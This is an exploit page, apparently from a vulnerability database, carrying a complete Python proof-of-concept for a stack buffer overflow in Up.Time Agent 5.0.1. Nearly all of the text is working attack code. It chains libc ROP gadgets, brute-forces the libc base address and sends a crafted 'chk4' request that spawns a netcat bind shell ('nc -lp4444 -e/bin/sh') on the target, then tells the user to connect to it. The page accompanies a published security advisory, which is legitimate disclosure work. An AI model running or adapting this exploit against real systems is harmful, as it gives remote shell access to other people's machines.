Uptime Agent 5.0.1 Stack Overflow Vulnerability

2013.12.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Up.Time Agent 5.0.1 Stack Overflow # Date: 28/11/2013 # Exploit Author: Denis Andzakovic # Vendor Homepage: http://www.uptimesoftware.com/ # Version: 5.0.1 # Tested on: Debian 7 (Kernel 3.2.0), Kali (Kernel 3.7) ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Uptime Agent 5.0.1 Stack Overflow Vulnerability Affected versions: Uptime Agent 5.0.1 (i386) PDF: http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf #!/usr/bin/python # # Stack based buffer overflow in Up.Time Agent 5.0.1 (i386). # This exploit will create a bind shell running on port # 4444 on the targeted host. # # Author: Denis Andzakovic # Date: 30/10/2013 # import socket import sys import time import argparse from struct import pack def copyBytes(string, location): pcaret = 0xd8f30 # pop ecx ; pop eax ;; movbyte = 0x29ecf # mov [eax] ecx ;; chain = pack("<I",pcaret+libcOffset) chain += str(string) chain += pack("<I",location) chain += pack("<I",movbyte+libcOffset) return chain def copyNullByte(location): # NOTE: eax *MUST* be null before hitting this chain. popedx = 0x1a9e # pop edx ;; nullcpy = 0x11f98d # mov [edx] al ; pop ebx ;; chain = pack("<I",popedx+libcOffset) chain += pack("<I",location) # address of NULL chain += pack("<I",nullcpy+libcOffset) chain += "BEES" # padding return chain def sendSploit(ip, port, libcOffset): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) customstack = 0x0804d380 # gadgets! 
pcaret = 0xd8f30 # pop ecx ; pop eax ;; popebx = 0x78af4 # pop ebx ;; movbyte = 0x29ecf # mov [eax] ecx ;; xoreax = 0x796bf # xor eax eax ;; popedx = 0x1a9e # pop edx ;; pcdret = 0x2a6eb # pop ecx ; pop edx ;; addeax = 0x7faa8 # add eax 0xb ;; callsys = 0xa10f5 # call gs:[0x10] ;; nullcpy = 0x11f98d # mov [edx] al ; pop ebx ;; # We will be executing "/bin//nc -lp4444 -e/bin/sh" using execve. # Arguments passed to execve will be loaded at our custom stack location rop = copyBytes("/bin",customstack) rop += copyBytes("//nc",customstack+4) rop += copyBytes("-lp4",customstack+9) rop += copyBytes("444A",customstack+13) rop += copyBytes("-e/b",customstack+17) rop += copyBytes("in/b",customstack+21) rop += copyBytes("shAA",customstack+24) # Set up the pointer array for execve() rop += copyBytes(pack("<I",customstack),customstack+27) rop += copyBytes(pack("<I",customstack+9),customstack+31) rop += copyBytes(pack("<I",customstack+17),customstack+35) # Set up Null bytes rop += pack("<I",xoreax+libcOffset) rop += copyNullByte(customstack+8) rop += copyNullByte(customstack+16) rop += copyNullByte(customstack+26) rop += copyNullByte(customstack+39) rop += copyNullByte(customstack+40) rop += copyNullByte(customstack+41) rop += copyNullByte(customstack+42) # Load parameters into relevant registers and Call execve rop += pack("<I",pcdret+libcOffset) rop += pack("<I",customstack+27) rop += pack("<I",customstack+39) rop += pack("<I",popebx+libcOffset) rop += pack("<I",customstack) rop += pack("<I",xoreax+libcOffset) rop += pack("<I",addeax+libcOffset) rop += pack("<I",callsys+libcOffset) rop += "AAAA" djubre = "chk4 " + "A"*243 s.sendall(djubre + rop) data = s.recv(1024) s.close() parser = argparse.ArgumentParser(description='Uptime Agent 5.0.1 CHK4 Buffer Overflow') parser.add_argument('-d','--host', help="IP Address of target machine", required=True) parser.add_argument('-p','--port', help="Port of target machine", required=True) args = parser.parse_args() spinnerChars = 
["|","/","-","\\","|","/","-","\\"] spinnerIndex = 0 print "[+] Attacking " + args.host + " on port " + args.port libc= 0xb7000 for i in range(0x000,0xfff): libcOffset = (libc+i)*0x1000 print spinnerChars[spinnerIndex] ," - Bruteforcing LibC Offset - ", hex(libcOffset)," \r", sys.stdout.flush() # 0xb7123 = 0xb7123000 sendSploit(args.host,int(args.port),libcOffset) spinnerIndex = spinnerIndex+1 if(spinnerIndex == 8): spinnerIndex = 0 print "\n[+] Completed! Access shell using 'nc <targethost> 4444'"

References:

http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf

